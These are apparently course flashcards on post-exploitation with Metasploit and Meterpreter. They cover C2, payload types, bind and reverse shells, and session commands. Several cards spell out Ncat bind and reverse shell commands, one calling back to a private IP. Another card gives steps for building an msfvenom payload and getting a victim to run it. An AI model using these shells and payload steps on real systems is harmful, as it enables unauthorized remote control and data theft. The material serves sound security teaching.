17.2 Post-Exploitation with Meterpreter Flashcards

1
Q

After successful exploitation, in which a session is established, Metasploit acts as a ___________ server, meaning it is able to ___________.

A

After successful exploitation, in which a session is established, Metasploit acts as a **command and control (C2)** server, meaning it is able to pass commands to exploited victim computers.

2
Q

C2 is a general term for what?

C2 is a vital technique for the post-exploitation phase of pen testing, when attackers will try to perform tasks such as ___________.

A

C2 is a general term for a non-standardized framework that controls sessions on infected hosts.

C2 is a vital technique for the post-exploitation phase of pen testing, when attackers will try to perform tasks such as data exfiltration (moving data from the victim computer to the host).

3
Q

Using Ncat, what is the command to set up a listener on a victim’s machine so you can connect to it from an attacker machine?

A

nc -lvnp 4444 -e /bin/bash

  • -l: Tells Ncat to listen for incoming connections.
  • -n: Indicates that we are listening for numeric IP addresses.
  • -v: Means verbose, which will print more information about the connection.
  • -p <port number>: Specifies which port to listen on.
  • -e: Executes a bash shell, specifically, /bin/bash.
4
Q

Using Ncat, how would you set up a reverse shell?

A

Using Ncat, set up a listener on the attacker’s machine that is prepared for the victim’s machine to connect back to it with the following commands:

On the attacker machine:

nc -lvnp 4444

On the victim machine, run:

nc 192.168.0.08 4444 -e /bin/bash

5
Q

A payload is the _______ that runs when an exploit successfully compromises a system.

A

A payload is the shell code that runs when an exploit successfully compromises a system.

6
Q

True or False:

Payloads will need to correspond to a specific OS and architecture.

A

True

A 64-bit payload is very different from a 32-bit payload.

7
Q

Some exploits can only handle a certain size of payload. If a payload is too big, it will fail. To address this size issue, we can use either of which two payload types? What is the difference between them?

A

To address this size issue, we can use either **staged** or **stageless** payloads.

Staged payloads come in multiple parts in order to minimize their overall initial payload size. Upon exploitation, the payload calls the rest of the payload down from the “staged” location.

Stageless payloads are complete payloads, and are significantly larger than staged payloads.

8
Q

If the payload is successful, it will establish a ____. This is the connection between the target machine and attacking machine.

A

If the payload is successful, it will establish a shell. This is the connection between the target machine and attacking machine.

9
Q

Two notable types of shells are:

A

**Bind shells** use a payload that opens up a port on a victim host and listens on that port for an incoming connection from the attacker host. This allows the attacker to connect to the victim.

**Reverse shells** use a payload that automatically reaches out to the attacker host to establish a session.

10
Q

When shells are used maliciously like this, they are also referred to as _______.

A

**backdoors**

11
Q

In your own words, what is Meterpreter?

A

It’s the flagship or default payload of Metasploit. Meterpreter allows an attacker to control a victim’s computer by running an invisible shell and establishing a communication channel back to the attacking machine.

12
Q

When connecting to the remote host, does Meterpreter start new processes, similar to SSH or Ncat?

A

Unlike SSH and Ncat, Meterpreter does not start any new processes on the victim. Instead, it “injects” itself into a program that’s already running.

13
Q

True or False:

Meterpreter encrypts all communication to and from the victim machine.

A

True

For example, the “windows/meterpreter/reverse_https” payload. This payload communicates over HTTPS, so it is less likely to be detected, and because it calls back to us, it is less likely to be picked up by a firewall as well. This is one of the standard reverse shells that we use in penetration testing.

14
Q

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to display the help menu?

A

?

15
Q

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to identify detailed Windows privilege information?

A

run win_privs

16
Q

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to gather the victim’s system information?

A

sysinfo

17
Q

Assuming that you have a Meterpreter shell, answer the following:

What command lets you upload a readme.txt to your victim’s computer?

A

upload readme.txt

18
Q

Attackers often try to get a Meterpreter shell by tricking their victims into downloading an executable file that they’ve created. How is the file created in Kali?

A
  • Create a custom payload using **msfvenom**.
  • Send your target to your payload.
  • Set up a listener using Metasploit.
    • For example: running use windows/meterpreter/reverse_tcp and set payload windows/meterpreter/reverse_tcp, and then defining the LHOST and LPORT.
  • Wait until the victim has executed your exploit.
19
Q

With Metasploit, we can use Meterpreter to:

A
  • Upload and download files to and from a target.
  • Set up port forwarding through the target.
  • Switch between Meterpreter shells.
  • Run Metasploit modules on remote hosts.
20
Q

Opening a Meterpreter session on a target host consists of four main steps:

A
  1. Exploiting the target.
  2. Uploading a Meterpreter payload on the target.
  3. Starting a TCP listener.
  4. Executing the Meterpreter payload.
21
Q

The easiest way to open a Meterpreter shell is _____________.

A common payload is ___________.

A

The easiest way to open a Meterpreter shell is to select an exploit and set a Meterpreter payload.

A common payload is `windows/meterpreter/reverse_tcp`.

22
Q

You can have multiple Meterpreter sessions open on multiple machines.

A

True

23
Q

What are the commands needed to connect to a Meterpreter session?

A
  • sessions: Lists all open Meterpreter sessions.
  • sessions -i <session>: Connects to a designated session.
  • sessions -i 1: Brings our session to the foreground, meaning any command we run on our host machine will be run on the Meterpreter shell on the target.
24
Q

Once we’ve connected to a Meterpreter session, what are some commands you can run to get information on the target? (9)

A

?: Prints Meterpreter’s help page, which lists all possible commands.

getuid: Prints user ID.

getwd: Prints current working directory.

ifconfig: Prints the victim’s network information.

sysinfo: Gathers system information (OS, architecture, kernel version).

upload: Uploads a file to the target.

download: Downloads a file from the target.

search: Searches for resources, similar to the find command in Linux.

run win_privs: Provides more detailed Windows privilege information.

run win_enum: Runs a comprehensive suite of Windows enumerations and stores the results on the attacking machine.